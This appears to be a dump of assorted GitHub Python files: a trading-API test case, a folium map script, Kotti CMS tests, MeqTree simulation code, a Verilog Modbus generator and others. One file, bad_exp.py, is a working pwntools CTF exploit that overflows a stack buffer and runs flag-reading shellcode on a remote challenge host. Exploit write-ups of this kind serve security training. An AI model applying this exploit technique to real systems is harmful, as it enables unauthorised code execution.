blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
eea4930741d6abd56735388dbe5fee2b2f87ee75
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/GEM_REGISTER/YW_GEM_REGISTERMM_SZXJ_127.py
|
27528edb669f197e9109add7e5ebe607c5e736eb
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,098
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_GEM_REGISTERMM_SZXJ_127(xtp_test_case):
# YW_GEM_REGISTERMM_SZXJ_127
def test_YW_GEM_REGISTERMM_SZXJ_127(self):
title = '创业板股票交易日限价委托卖-允许的最小申报数量+1(100+1)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '废单',
'errorID': 11010123,
'errorMSG': queryOrderErrorMsg(11010123),
'是否生成报单': '是',
'是否是撤废': '否',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('300200', '2', '2', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'用例测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
self.assertEqual(rs['用例测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':2,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SZ_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_BUY'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
'price': stkparm['随机中间价'],
'quantity': 101,
'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
CaseParmInsertMysql(case_goal, wt_reqs)
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
61d2c3982e7271cd9a61b62154ec8ce6e0dbf60f
|
d72360671c444f0aab2c9d6d1a138fd5ac7ec145
|
/mapping/map1.py
|
20c951fb7fdc52ab030e7e61622dd845105c7bf2
|
[] |
no_license
|
sfagade/python_ramp-up
|
b068c5bff0c48328f1596b6ff6f123520ca9d11d
|
0eaa41a86353b48ad3fa482b387e819977c27435
|
refs/heads/master
| 2022-12-29T01:03:53.982925
| 2020-10-09T20:50:40
| 2020-10-09T20:50:40
| 289,117,000
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 897
|
py
|
import folium
import pandas
data = pandas.read_csv("Volcanoes.txt")
lon = list(data["LON"])
lat = list(data["LAT"])
elev = list(data["ELEV"])
def color_producer(elevation):
if elevation < 1000:
return "green"
elif 1000 <= elevation < 3000:
return "orange"
else:
return "red"
# map = folium.Map(location=[6.501990, 3.337579], zoom_start=16, titles="Stamen Terrain")
my_map = folium.Map(location=[38.58, -99.09], zoom_start=6, titles="Stamen Terrain")
fg = folium.FeatureGroup(name="my Map")
for lt, ln, el in zip(lat, lon, elev):
fg.add_child(folium.CircleMarker(location=[lt, ln], radios=6, popup=str(el) + " m",
fill_color=color_producer(el), color="grey", fill_opacity=0.7))
fg.add_child(folium.GeoJson(data=open("world.json", "r", encoding="utf-8-sig").read()))
my_map.add_child(fg)
my_map.save("Map1.html")
|
[
"sfagade@gmail.com"
] |
sfagade@gmail.com
|
14592b2360ff1e4a73c58ab9b09115d28d53b208
|
9ba3b695fb56cce1a71a6aeb906bdf022d18fb37
|
/Actividades/AC03/archivos.py
|
f4ff7b705afb4f2fd5a4e9d6b297bbcbbb3ab691
|
[] |
no_license
|
Gaonuk/IIC2233-Gaonuk
|
6b44bdf4fb722f5bc86fdd57260863c8c5b0f123
|
30d7bf836c4987de321deda0ea8fe0bff461bd98
|
refs/heads/main
| 2023-01-01T14:25:27.025071
| 2020-10-19T23:42:22
| 2020-10-19T23:42:22
| 305,539,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,685
|
py
|
from yoNube import descargar
from decodificador import decodificar
from collections import namedtuple
import os
# ------ ESTRUCTURAS ------
Cancion = namedtuple("Cancion", ["id", "nombre", "id_artista", "duracion"])
Artista = namedtuple("Artista", ["id", "nombre", "genero", "ano_formacion"])
Usuario = namedtuple("Usuario", ["nombre", "username", "fecha_ingreso"])
Rating = namedtuple("Rating", ["username", "id_cancion", "rating"])
# ----- DECORADOR -------
def desencriptar(funcion_decodificadora, tipo_archivo):
"""
Decorador que permite desencriptar las bases de datos.
La desencriptación requiere de una función decodificadora.
"""
# Este es el código base del decorador y es completamente editable
def decorador(funcion_a_decorar):
def wrapper(*args, **kwargs):
linea = funcion_a_decorar(*args, **kwargs)
atributos_desencriptados = []
for i in linea:
atributos_desencriptados.append(funcion_decodificadora(i))
if tipo_archivo == 'canciones':
cancion = Cancion(*atributos_desencriptados)
yield cancion
elif tipo_archivo == 'artistas':
artista = Artista(atributos_desencriptados)
yield artista
elif tipo_archivo == 'usuarios':
usuario = Usuario(atributos_desencriptados)
yield usuario
elif tipo_archivo == 'ratings':
rating = Rating(atributos_desencriptados)
yield rating
return funcion_a_decorar(*args, **kwargs)
return wrapper
return decorador
# ------------------------------------------------------------
# --------- NO MODIFICAR LAS FUNCIONES, SOLO DECORAR ---------
# ------------------------------------------------------------
@desencriptar(decodificar, "canciones")
def leer_canciones(path):
"""
Esta función recibe una ruta (path) y retorna un generador con los datos.
Nota que es cada línea se divide por las comas, por lo tanto entrega
5 elementos.
Decorar para:
=============
- Desencriptar los datos.
- Entregar las instancias correspondientes.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
@desencriptar(decodificar, "artistas")
def leer_artistas(path):
"""
Esta función recibe una ruta (path) y retorna un generador con los datos.
Nota que es cada línea se divide por las comas, por lo tanto entrega
4 elementos.
Decorar para:
=============
- Desencriptar los datos.
- Entregar las instancias correspondientes.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
@desencriptar(decodificar, "usuarios")
def leer_usuarios(path):
"""
Esta función recibe una ruta (path) y retorna un generador con los datos.
Nota que es cada línea se divide por las comas, por lo tanto entrega
3 elementos.
Decorar para:
=============
- Desencriptar los datos.
- Entregar las instancias correspondientes.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
@desencriptar(decodificar, "ratings")
def leer_ratings(path):
"""
Esta función recibe una ruta (path) y retorna un generador con los datos.
Nota que es cada línea se divide por las comas, por lo tanto entrega
3 elementos.
Decorar para:
=============
- Desencriptar los datos.
- Entregar las instancias correspondientes.
"""
with open(path, 'r', encoding = 'utf-8') as archivo:
for linea in archivo:
yield linea.strip().split(',')
if __name__ == "__main__":
ruta_canciones = os.path.join("data_base", "canciones.csv")
canciones = leer_canciones(ruta_canciones)
ruta_artistas = os.path.join("data_base", "artistas.csv")
artistas = leer_artistas(ruta_artistas)
ruta_usuarios = os.path.join("data_base", "usuarios.csv")
usuarios = leer_usuarios(ruta_usuarios)
ruta_ratings = os.path.join("data_base", "ratings.csv")
ratings = leer_ratings(ruta_ratings)
generadores = [canciones, artistas, usuarios, ratings]
for gen in generadores:
print(f"\nProbando generador : ")
print(next(gen))
print(next(gen))
print(next(gen))
print(next(gen))
|
[
"rodrigogaonagonzalez@gmail.com"
] |
rodrigogaonagonzalez@gmail.com
|
216a68959b056f2c905551380a0307e8239cc347
|
fc267c989485555d8cf9c857c150c38fe7e7ee4c
|
/bank/urls.py
|
b7e1bfa5159a897f751c361128df84d157fd7633
|
[] |
no_license
|
oladejioluwaseun/Django-task-using-bank-instead-of-blog
|
fe8be45b26675c6fd16407e30384a874eba3852d
|
d52c66bb588eb5b0914f30def0bd788d05470922
|
refs/heads/main
| 2023-06-16T23:42:24.392683
| 2021-07-07T19:17:31
| 2021-07-07T19:17:31
| 384,074,816
| 0
| 0
| null | 2021-07-08T09:41:04
| 2021-07-08T09:41:03
| null |
UTF-8
|
Python
| false
| false
| 673
|
py
|
from django.urls import path
from .views import (
BlogListView,
BlogDetailView,
BlogCreateView,
BlogUpdateView,
BlogDeleteView,
add_comment_to_post,
)
urlpatterns = [
path('post/<int:pk>/delete/',BlogDeleteView.as_view(),
name='post_delete'),
path('post/<int:pk>/comment/',add_comment_to_post, name='add_comment_to_post'),
path('post/<int:pk>/edit/',BlogUpdateView.as_view(),
name='post_edit'),
path('post/new/', BlogCreateView.as_view(), name='post_new'),
path('post/<int:pk>/',BlogDetailView.as_view(),
name='post_detail'),
path('', BlogListView.as_view(), name='home')
]
|
[
"taiwobukola98@gmail.com"
] |
taiwobukola98@gmail.com
|
e00d2bd87c9b7d1500ef6138338e98dbd89536ac
|
595f2d2156efa97da6f667b01375c6f9176184be
|
/BUUCTF/Ubuntu16.04/bad_exp.py
|
a4d7877406a8235d2531783f7f2af9954a67489b
|
[] |
no_license
|
R4ilgun/my_pwn
|
466f6b7d3dde2d6b9ccc2a56fcef97b24247b123
|
16ce89f15da6f5440d42c97f045fda44c609c904
|
refs/heads/master
| 2020-12-22T05:18:52.645593
| 2020-08-16T07:15:57
| 2020-08-16T07:15:57
| 236,680,643
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 861
|
py
|
#! /usr/bin/python
import sys
from pwn import *
from LibcSearcher import *
sl = lambda x:p.sendline(x)
sd = lambda x:p.send(x)
sda = lambda x,y:p.sendafter(x,y)
sla = lambda x,y:p.sendlineafter(x,y)
rv = lambda x:p.recv(x)
ru = lambda x:p.recvuntil(x)
ia = lambda :p.interactive()
context(arch="amd64",os="Linux",log_level='debug')
if(sys.argv[1] == 'l'):
p = process("./bad")
elf = ELF("./bad")
else:
p = remote('node3.buuoj.cn',25335)
elf = ELF("./bad")
mmap=0x123000
jmp_rsp=0x400A01
payload = (asm(shellcraft.read(0,mmap,0x100)) + asm("mov rax,0x123000;call rax")).ljust(0x28,'\x00')
payload+= p64(jmp_rsp) + asm("sub rsp,0x30;jmp rsp")
sda("have fun!\n",payload)
shellcode = shellcraft.open('./flag')
shellcode+= shellcraft.read(3,mmap,0x50)
shellcode+= shellcraft.write(1,mmap,0x50)
shellcode = asm(shellcode)
sleep(0.1)
sl(shellcode)
ia()
|
[
"noreply@github.com"
] |
R4ilgun.noreply@github.com
|
3e3ddce1f52bf0d064e62d2045cc7877ad848187
|
923a3f7be34e10931936823df0740d5d845d26e5
|
/Courses/Workshop2007/ME2/example2-nps-meow.py
|
3a1cddff5066679cab4ca870d06a51b0f1acb030
|
[] |
no_license
|
o-smirnov/public-documents
|
0572ccef548a321e70b8cad2e2f2c249926f017d
|
9e758ddf375c0f748376d2e37d0fea9661ed7c37
|
refs/heads/master
| 2021-01-15T23:40:03.183127
| 2015-06-04T17:18:22
| 2015-06-04T17:18:22
| 31,723,928
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,058
|
py
|
# standard preamble
#
#% $Id$
#
#
# Copyright (C) 2002-2007
# The MeqTree Foundation &
# ASTRON (Netherlands Foundation for Research in Astronomy)
# P.O.Box 2, 7990 AA Dwingeloo, The Netherlands
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>,
# or write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from Timba.TDL import *
from Timba.Meq import meq
import math
import Meow
import Meow.Utils
import Meow.Bookmarks
import Meow.StdTrees
# some GUI options
Meow.Utils.include_ms_options(has_input=False,tile_sizes=[16,32,48,96]);
Meow.Utils.include_imaging_options(npix=256,arcmin=4,channels=[[32,1,1]]);
# define antenna list
ANTENNAS = range(1,28);
# useful constant: 1 deg in radians
DEG = math.pi/180.;
ARCMIN = DEG/60;
# source flux (same for all sources)
I = 1; Q = .2; U = .2; V = .2;
# we'll put the sources on a grid (positions in arc min)
LM = [(-1,-1),(-1,0),(-1,1),
( 0,-1),( 0,0),( 0,1),
( 1,-1),( 1,0),( 1,1)];
def _define_forest (ns):
# create an Array object
array = Meow.IfrArray(ns,ANTENNAS);
# create an Observation object
observation = Meow.Observation(ns);
# set global context
Meow.Context.set(array=array,observation=observation);
# create 10 sources
sources = [];
for isrc in range(len(LM)):
l,m = LM[isrc];
l *= ARCMIN;
m *= ARCMIN;
# generate a name for this direction and source
srcname = 'S'+str(isrc);
# create Direction object
src_dir = Meow.LMDirection(ns,srcname,l,m);
# create point source with this direction
sources.append( Meow.PointSource(ns,srcname,src_dir,I=I,Q=Q,U=U,V=V) );
# create a Patch for the entire observed sky
allsky = Meow.Patch(ns,'all',observation.phase_centre);
allsky.add(*sources);
# create set of nodes to compute visibilities...
predict = allsky.visibilities();
# make some useful inspectors. Collect them into a list, since we need
# to give a list of 'post' nodes to make_sinks() below
inspectors = [];
inspectors.append(
Meow.StdTrees.vis_inspector(ns.inspect_predict,predict) );
for i in [0,1,4,5]:
inspectors.append(
Meow.StdTrees.vis_inspector(ns.inspect_predict(i),sources[i].visibilities(),bookmark=False) );
# make sinks and vdm. Note that we don't want to make any spigots...
# The list of inspectors comes in handy here
Meow.StdTrees.make_sinks(ns,predict,spigots=False,post=inspectors);
# make some bookmarks. Note that inspect_predict gets its own bookmark
# automatically; for the others we said bookmark=False because we
# want to put them onto a single page
pg = Meow.Bookmarks.Page("Inspectors",2,2);
for i in [0,1,4,5]:
pg.add(ns.inspect_predict(i),viewer="Collections Plotter");
# make a few more bookmarks
pg = Meow.Bookmarks.Page("K Jones",2,2);
for p in array.stations()[1:4]: # use stations 1 through 3
for src in sources[:4]: # use sources 0 through 3
pg.add(src.direction.KJones()(p));
def _tdl_job_1_simulate_MS (mqs,parent):
req = Meow.Utils.create_io_request();
# execute
mqs.execute('VisDataMux',req,wait=False);
# this is a useful thing to have at the bottom of the script, it allows us to check the tree for consistency
# simply by running 'python script.tdl'
if __name__ == '__main__':
ns = NodeScope();
_define_forest(ns);
# resolves nodes
ns.Resolve();
print len(ns.AllNodes()),'nodes defined';
|
[
"osmirnov@gmail.com"
] |
osmirnov@gmail.com
|
f11fccf1de6f0337bc9f35255087e07d844ab455
|
e33c95326f6800d435125427a73460a009532a12
|
/kotti/tests/test_node.py
|
2b37ce96b1532b6dd48906b0dc6308fb2ca9c3ba
|
[
"BSD-3-Clause-Modification"
] |
permissive
|
stevepiercy/Kotti
|
839269f6dc1c45645e5d868b0f17e27bea04b5ac
|
45c1627ae9fedbc24d1b817048e153f4d7a2d06d
|
refs/heads/master
| 2021-01-17T21:33:02.795714
| 2012-03-17T22:06:04
| 2012-03-17T22:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,835
|
py
|
from pyramid.security import ALL_PERMISSIONS
from sqlalchemy.exc import IntegrityError
from sqlalchemy.exc import SQLAlchemyError
from kotti.testing import UnitTestBase
class TestNode(UnitTestBase):
def test_root_acl(self):
from kotti.resources import get_root
root = get_root()
# The root object has a persistent ACL set:
self.assertEquals(
root.__acl__[1:], [
('Allow', 'system.Everyone', ['view']),
('Allow', 'role:viewer', ['view']),
('Allow', 'role:editor', ['view', 'add', 'edit']),
('Allow', 'role:owner', ['view', 'add', 'edit', 'manage']),
])
# Note how the first ACE is class-defined. Users of the
# 'admin' role will always have all permissions. This is to
# prevent lock-out.
self.assertEquals(root.__acl__[:1], root._default_acl())
def test_set_and_get_acl(self):
from kotti import DBSession
from kotti.resources import get_root
root = get_root()
# The __acl__ attribute of Nodes allows access to the mapped
# '_acl' property:
del root.__acl__
self.assertRaises(AttributeError, root._get_acl)
root.__acl__ = [['Allow', 'system.Authenticated', ['edit']]]
self.assertEquals(
root.__acl__, [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Allow', 'system.Authenticated', ['edit']),
])
root.__acl__ = [
('Allow', 'system.Authenticated', ['view']),
('Deny', 'system.Authenticated', ALL_PERMISSIONS),
]
self.assertEquals(
root.__acl__, [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Allow', 'system.Authenticated', ['view']),
('Deny', 'system.Authenticated', ALL_PERMISSIONS),
])
# We can reorder the ACL:
first, second = root.__acl__[1:]
root.__acl__ = [second, first]
self.assertEquals(
root.__acl__, [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Deny', 'system.Authenticated', ALL_PERMISSIONS),
('Allow', 'system.Authenticated', ['view']),
])
DBSession.flush()
DBSession.expire_all()
self.assertEquals(root.__acl__[1:], [second, first])
root._del_acl()
self.assertRaises(AttributeError, root._del_acl)
def test_unique_constraint(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
# Try to add two children with the same name to the root node:
session = DBSession()
root = get_root()
session.add(Node(name=u'child1', parent=root))
session.add(Node(name=u'child1', parent=root))
self.assertRaises(IntegrityError, session.flush)
def test_container_methods(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
session = DBSession()
# Test some of Node's container methods:
root = get_root()
self.assertEquals(root.keys(), [])
child1 = Node(name=u'child1', parent=root)
session.add(child1)
self.assertEquals(root.keys(), [u'child1'])
self.assertEquals(root[u'child1'], child1)
del root[u'child1']
self.assertEquals(root.keys(), [])
# When we delete a parent node, all its child nodes will be
# released as well:
root[u'child2'] = Node()
root[u'child2'][u'subchild'] = Node()
self.assertEquals(
session.query(Node).filter(Node.name == u'subchild').count(), 1)
del root[u'child2']
self.assertEquals(
session.query(Node).filter(Node.name == u'subchild').count(), 0)
# We can pass a tuple as the key to more efficiently reach
# down to child objects:
root[u'child3'] = Node()
subchild33 = Node(name=u'subchild33', parent=root[u'child3'])
session.add(subchild33)
del root.__dict__['_children']
self.assertTrue(
root[u'child3', u'subchild33'] is root[u'child3'][u'subchild33'])
self.assertTrue(
root[(u'child3', u'subchild33')] is subchild33)
self.assertRaises(KeyError, root.__getitem__, (u'child3', u'bad-name'))
del root[u'child3']
# Overwriting an existing Node is an error; first delete manually!
child4 = Node(name=u'child4', parent=root)
session.add(child4)
self.assertEquals(root.keys(), [u'child4'])
child44 = Node(name=u'child4')
session.add(child44)
root[u'child4'] = child44
self.assertRaises(SQLAlchemyError, session.flush)
def test_node_copy_name(self):
from kotti.resources import get_root
root = get_root()
copy_of_root = root.copy(name=u'copy_of_root')
self.assertEqual(copy_of_root.name, u'copy_of_root')
self.assertEqual(root.name, u'')
def test_node_copy_variants(self):
from kotti.resources import get_root
from kotti.resources import Node
root = get_root()
child1 = root['child1'] = Node()
child1['grandchild'] = Node()
child2 = root['child2'] = Node()
# first way; circumventing the Container API
child2.children.append(child1.copy())
# second way; canonical way
child2['child2'] = child1.copy()
# third way; this is necessary in cases when copy() will
# attempt to put the new node into the db already, e.g. when
# the copy is already being back-referenced by some other
# object in the db.
child1.copy(parent=child2, name=u'child3')
assert [child.name for child in child2.children] == [
'child1', 'child2', 'child3']
def test_node_copy_parent_id(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
root = get_root()
child1 = root['child1'] = Node()
grandchild1 = child1['grandchild1'] = Node()
DBSession.flush()
grandchild2 = grandchild1.copy()
assert grandchild2.parent_id is None
assert grandchild2.parent is None
def test_node_copy_with_local_groups(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
from kotti.resources import LocalGroup
root = get_root()
child1 = root['child1'] = Node()
local_group1 = LocalGroup(child1, u'joe', u'role:admin')
DBSession.add(local_group1)
DBSession.flush()
child2 = root['child2'] = child1.copy()
DBSession.flush()
assert child2.local_groups == []
def test_clear(self):
from kotti import DBSession
from kotti.resources import get_root
from kotti.resources import Node
child = get_root()['child'] = Node()
assert DBSession.query(Node).filter(Node.name == u'child').all() == [
child]
get_root().clear()
assert DBSession.query(Node).filter(Node.name == u'child').all() == []
def test_annotations_mutable(self):
from kotti import DBSession
from kotti.resources import get_root
root = get_root()
root.annotations['foo'] = u'bar'
self.assertTrue(root in DBSession.dirty)
del root.annotations['foo']
def test_nested_annotations_mutable(self):
from kotti import DBSession
from kotti.resources import get_root
root = get_root()
root.annotations['foo'] = {}
DBSession.flush()
DBSession.expire_all()
root = get_root()
root.annotations['foo']['bar'] = u'baz'
self.assertTrue(root in DBSession.dirty)
DBSession.flush()
DBSession.expire_all()
root = get_root()
self.assertEqual(root.annotations['foo']['bar'], u'baz')
def test_annotations_coerce_fail(self):
from kotti.resources import get_root
root = get_root()
self.assertRaises(ValueError, setattr, root, 'annotations', [])
class TestLocalGroup(UnitTestBase):
def test_copy(self):
from kotti.resources import get_root
from kotti.resources import LocalGroup
node, principal_name, group_name = get_root(), 'p', 'g'
lg = LocalGroup(node, principal_name, group_name)
lg2 = lg.copy()
assert lg2 is not lg
assert lg.node is lg2.node
assert lg.principal_name == lg2.principal_name
assert lg.group_name == lg2.group_name
|
[
"daniel.nouri@gmail.com"
] |
daniel.nouri@gmail.com
|
53874b617f016a03515b45a9cf28f4a43fd997f7
|
d5529b54c8ff086f1fdb23e68825b4551feb3673
|
/ModbusRTUMasterBlocksGenerator.py
|
faf9ad749023f8c83cd155bf4ccbbf125e5555d8
|
[] |
no_license
|
SokolovRV/ModbusRTU
|
e0693864e8cb27346568e444886b2d5e3aee46ba
|
7ddc9aee65bf0e6ca75dc654f6caaa476faec2c8
|
refs/heads/master
| 2021-07-12T21:12:54.925822
| 2020-07-24T07:23:40
| 2020-07-24T07:23:40
| 170,082,041
| 11
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,266
|
py
|
from jinja2 import Template
input_module = Template("""
module data_mux_{{t_adress}}_{{t_prefix}} (
input clk,
input [7:0] selector,
{%- for n in range(t_n_ports_w) %}
input [15:0] data_{{n+t_first_reg_w}}_{{t_adress}},
{%- endfor %}
input reset,
output reg [7:0] adr,
output reg [15:0] adr_first_reg_tx,
output reg [7:0] num_reg_tx,
output reg [15:0] adr_first_reg_rx,
output reg [7:0] num_reg_rx,
output reg [15:0] data_out
);
parameter [7:0] slave_adr = {{t_adress}};
parameter [15:0] adr_first_reg_write = {{t_first_reg_w}};
parameter [7:0] num_reg_write = {{t_n_ports_w}};
parameter [15:0] adr_first_reg_read = {{t_first_reg_r}};
parameter [7:0] num_reg_write_read = {{t_n_ports_r}};
initial begin
data_out = 16'h0000;
adr = slave_adr;
adr_first_reg_tx = adr_first_reg_write;
num_reg_tx = num_reg_write;
adr_first_reg_rx = adr_first_reg_read;
num_reg_rx = num_reg_write_read;
end
always @(posedge clk) begin
if(reset)
data_out <= 16'h0000;
else begin
case(selector)
{%- for n in range(t_n_ports_w) %}
{{n+1}}: data_out <= data_{{n+t_first_reg_w}}_{{t_adress}};
{%- endfor %}
default: data_out <= 16'h0000;
endcase
end
end
endmodule
""")
output_module = Template("""
module data_demux_{{t_adress}}_{{t_prefix}} (
input clk,
input [7:0] adr,
input [7:0] n_data,
input [15:0] data_in,
input data_strb,
input crc_validate,
input reset,
{%- for n in range(t_n_ports_r) %}
output reg [15:0] data_{{n+t_first_reg_r}}_{{t_adress}}{% if (n+1)<t_n_ports_r %},{% endif %}
{%- endfor %}
);
parameter [7:0] slave_id = {{t_adress}};
parameter [7:0] number_of_reg = {{t_n_ports_r}};
(*ramstyle = "no_rw_check"*)reg [15:0] mem [number_of_reg:0];
reg previous_strb_0 = 1'b0;
reg [15:0] data_buff = 16'h0000;
reg [7:0] n = 8'h00;
initial begin
{%- for n in range(t_n_ports_r) %}
data_{{n+t_first_reg_r}}_{{t_adress}} = 16'h0000;
{%- endfor %}
end
always @(posedge clk) begin
if(reset)
data_buff <= 16'h0000;
else begin end
previous_strb_0 <= data_strb;
if(data_strb && !previous_strb_0 && adr == slave_id) begin
mem[n_data] <= data_in;
end
else begin end
if(crc_validate) begin
data_buff <= mem[n_data];
n <= n_data;
end
else begin end
end
always @(posedge clk) begin
if(reset) begin
{%- for n in range(t_n_ports_r) %}
data_{{n+t_first_reg_r}}_{{t_adress}} <= 16'h0000;
{%- endfor %}
end
else begin
case(n)
{%- for n in range(t_n_ports_r) %}
{{n+1}}: data_{{n+t_first_reg_r}}_{{t_adress}} <= data_buff;
{%- endfor %}
default: begin end
endcase
end
end
endmodule
""")
select_module = Template("""
module slave_select_{{t_prefix}} (
input clk,
{%- for n in t_n_slaves %}
input [7:0] adr_{{n}},
input [15:0] adr_first_reg_tx_{{n}},
input [7:0] num_reg_tx_{{n}},
input [15:0] adr_first_reg_rx_{{n}},
input [7:0] num_reg_rx_{{n}},
input [15:0] data_in_{{n}},
{%- endfor %}
input transfer_done,
input reset,
output reg [7:0] adr,
output reg [15:0] adr_first_reg_tx,
output reg [7:0] num_reg_tx,
output reg [15:0] adr_first_reg_rx,
output reg [7:0] num_reg_rx,
output reg [15:0] data_out
);
parameter [7:0] number_of_slaves = {{t_cnt_slaves}};
reg [7:0] selector = 8'h01;
reg previous_strb = 1'b0;
initial begin
adr = 8'h00;
adr_first_reg_rx = 16'h0000;
adr_first_reg_tx = 16'h0000;
num_reg_rx = 8'h00;
num_reg_tx = 8'h00;
data_out = 16'h0000;
end
always @(posedge clk) begin
if(reset) begin
selector <= 8'h01;
end
else begin
previous_strb <= transfer_done;
if(transfer_done && !previous_strb) begin
if(selector == number_of_slaves)
selector <= 8'h01;
else
selector <= selector + 8'h01;
end
else begin end
case(selector)
{%- for n in range(t_cnt_slaves) %}
{{n+1}}: begin
adr <= adr_{{t_n_slaves[n]}};
adr_first_reg_rx <= adr_first_reg_rx_{{t_n_slaves[n]}};
adr_first_reg_tx <= adr_first_reg_tx_{{t_n_slaves[n]}};
num_reg_rx <= num_reg_rx_{{t_n_slaves[n]}};
num_reg_tx <= num_reg_tx_{{t_n_slaves[n]}};
data_out <= data_in_{{t_n_slaves[n]}};
end
{%- endfor %}
default: begin end
endcase
end
end
endmodule
""")
print('\n ::: Modbus ports modules generator (Verylog) :::\n'
' ::: version: 1.0 :::\n '
'::: developer: Sokolov R.V. :::\n '
'::: For more information read the txt file in root folder ::: \n\n')
mode = int(input('What modules need to be generated (select 1 or 2):\n'
' 1. - input + output modules \n'
' 2. - select module\n'
' Your choice: '))
print('\n')
if mode == 1:
p_prefix = input('\nInput prefix for modules names (data_mux(/demux)_{your prefix}.v): ')
p_address = int(input('Input address of slave device: '))
p_n_ports_w = int(input('Input count of INPUT ports: '))
p_first_reg_w = int(input('Input number of first register for WRITE in slave (INPUT): '))
p_n_ports_r = int(input('Input count of OUTPUT ports: '))
p_first_reg_r = int(input('Input number of first register for READ in slave (OUTPUT): '))
txt_in = input_module.render(
t_prefix = p_prefix,
t_adress = p_address,
t_n_ports_w = p_n_ports_w,
t_n_ports_r = p_n_ports_r,
t_first_reg_w = p_first_reg_w,
t_first_reg_r = p_first_reg_r
)
txt_out = output_module.render(
t_prefix = p_prefix,
t_adress = p_address,
t_n_ports_r = p_n_ports_r,
t_first_reg_r = p_first_reg_r
)
file_name_in = 'data_mux_' + p_prefix + '.v'
file_name_out = 'data_demux_' + p_prefix + '.v'
file = open(file_name_in, 'w')
file.write(txt_in)
file.close()
file = open(file_name_out, 'w')
file.write(txt_out)
file.close()
print('\n >>> ' + file_name_in + '\n >>> ' + file_name_out + ' - files was generated in root folder! \n\n')
